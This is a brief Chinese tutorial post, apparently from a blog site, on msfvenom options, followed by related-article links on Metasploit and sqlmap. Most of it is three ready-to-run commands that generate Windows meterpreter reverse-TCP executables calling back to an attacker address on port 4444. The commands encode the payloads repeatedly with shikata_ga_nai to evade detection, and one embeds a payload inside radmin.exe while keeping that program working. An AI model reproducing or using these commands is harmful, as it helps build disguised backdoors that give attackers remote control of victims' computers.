msfvenom使用

--list 列出所有可用的payloads,encoders,nops

--help-formats 查看支持的输出格式

-b 指定需要过滤的坏字符,使用-b选项后,会自动选择编码方式

-e 指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-i 指定payload的编码次数

-x 指定一个exe文件作为模板

-k 保护模板程序的功能,注入的payload作为一个新的进程运行


root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o a.exe

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -b '\x00\xff' -i 10 -f exe -o b.exe

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=4444 -e x86/shikata_ga_nai -k -x /usr/share/windows-binaries/radmin.exe -f exe -o radmin.exe

推荐阅读更多精彩内容

  • 转自:http://www.freebuf.com/sectool/105524.html 本文为作者总结自己在渗...
    许安念安阅读 2,373评论 0 10
  • 一、MSF终端命令 show exploits 列出metasploit框架中所有的渗透攻击模块 show pay...
    Kaen阅读 1,473评论 0 2
  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 1,131评论 0 5
  • Exploit模块 RHOST远程主机,LHOST本地主机 1.active,受害者的服务存在漏洞,攻击者主动向受...
    Instu阅读 2,685评论 0 2
  • 前言 提权何须收集各种EXP,一个MSF就够了,本文为大家带来MSF综合提权的一些姿势。 文章内容: 学习`Met...
    钦玄阅读 6,383评论 1 9